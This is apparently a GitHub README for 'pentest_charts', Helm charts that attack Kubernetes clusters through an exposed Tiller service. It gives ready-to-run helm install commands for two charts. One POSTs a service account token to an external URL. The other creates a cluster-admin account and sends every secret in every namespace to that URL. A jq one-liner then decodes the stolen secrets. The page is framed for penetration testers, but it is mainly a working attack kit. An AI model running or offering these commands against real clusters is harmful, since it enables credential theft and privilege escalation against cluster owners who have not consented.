Skip to content

ropnop/pentest_charts

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
charts
charts
 
 
docs
docs
 
 
README.md
README.md
 
 

Repository files navigation

About

These are a few Helm Charts I've made to help exfiltrate data or privesc when you're in a Kubernetes Cluster and have access to Tiller, but not to the Kubernetes API.

For more information, see my blogpost about attacking Tiller from inside a cluster: https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/

Charts

To use these charts, you must first initialize Helm, then you can install the charts directly from the repo:

$ helm init --client-only
$ helm install --repo https://ropnop.github.io/pentest_charts/ <chart_name> [options]

exfil_sa

This chart deploys a job designed to simply POST the pod's service account token to a URL. This is useful if you have access to Tiller and know a specific service account who's token you'd like to steal. It takes the following values:

  • name - the name of the release, job and pod.
  • serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
  • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)
  • namespace - defaults to kube-system, but you can override it

Usage:

helm install --name tiller-deployer --set serviceAccountName=tiller --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh" --repo https://ropnop.github.io/pentest_charts exfil_sa_token

This will POST the token in the body of an HTTP request to exfilURL.

To clean up: helm delete --purge <release_name>

exfil_secrets

This chart creates a new service account with cluster-admin privileges, then deploys a job with that new service account to read all the secrets in every namespace from the Kubernetes API and POST the data back to an exfilURL.

It takes the following values:

  • name - the name of the release, job and pod.
  • serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
  • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)
  • namespace - defaults to kube-system, but you can override it

Usage:

helm install --name tiller-deployer --set serviceAccountName="tiller-deployer" --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh/all_secrets.json" --repo https://ropnop.github.io/pentest_charts exfil_secrets

This will POST every Kubernetes secret in JSON form to the exfilURL. To parse through and quickly decode all the secrets, you can use jq:

cat all_secrets.json| jq '[.items[] | . as $secret| .data | to_entries[] | {namespace: $secret.metadata.namespace, name: $secret.metadata.name, type: $secret.type, created: $secret.metadata.creationTimestamp, key: .key, value: .value|@base64d}]'

To clean up: helm delete --purge <release_name>

About

Some helpful Helm Charts for pentesters

Resources

Readme
Activity

Stars

39 stars

Watchers

3 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages